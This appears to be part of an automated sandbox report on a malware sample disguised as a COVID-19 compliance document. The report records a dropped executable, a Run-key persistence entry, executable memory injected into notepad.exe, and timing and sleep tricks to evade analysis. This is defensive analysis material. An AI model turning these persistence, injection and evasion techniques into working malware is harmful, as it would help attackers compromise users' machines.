Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_50486194 push 504861C0h; ret 6_2_504861B8
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_50492A54 push 50492AFFh; ret 6_2_50492AF7
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_504832C8 push eax; ret 6_2_50483304
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_50486364 push eax; ret 6_2_50486368
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_50492B04 push 50492B94h; ret 6_2_50492B8C
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_5048C320 push 5048C49Ch; ret 6_2_5048C494
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_504863CC push 504864C8h; ret 6_2_504864C0
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_504863AC push eax; iretd 6_2_504863C8
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_504863A4 push eax; retf 6_2_504863A8
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_5048F44C push 5048F4C2h; ret 6_2_5048F4BA
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeJump to dropped file
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XbuhJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XbuhJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 14_3_023F0658 rdtsc 14_3_023F0658
Source: C:\Windows\SysWOW64\notepad.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe TID: 352Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 5540Thread sleep count: 36 > 30Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 5540Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_5048518C
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 14_3_023F0658 rdtsc 14_3_023F0658

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 50480000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 150000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 160000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 1F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 200000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 210000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 220000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 230000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 240000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 250000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 260000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 270000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 280000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 290000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 23D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 23F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2710000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2720000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2780000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2790000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27B0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27E0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2800000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2810000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2820000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2830000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2840000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2850000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2860000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2870000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2880000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2890000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 28A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4150000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4160000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4170000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41B0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41C0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41E0000 protect: page execute and read and write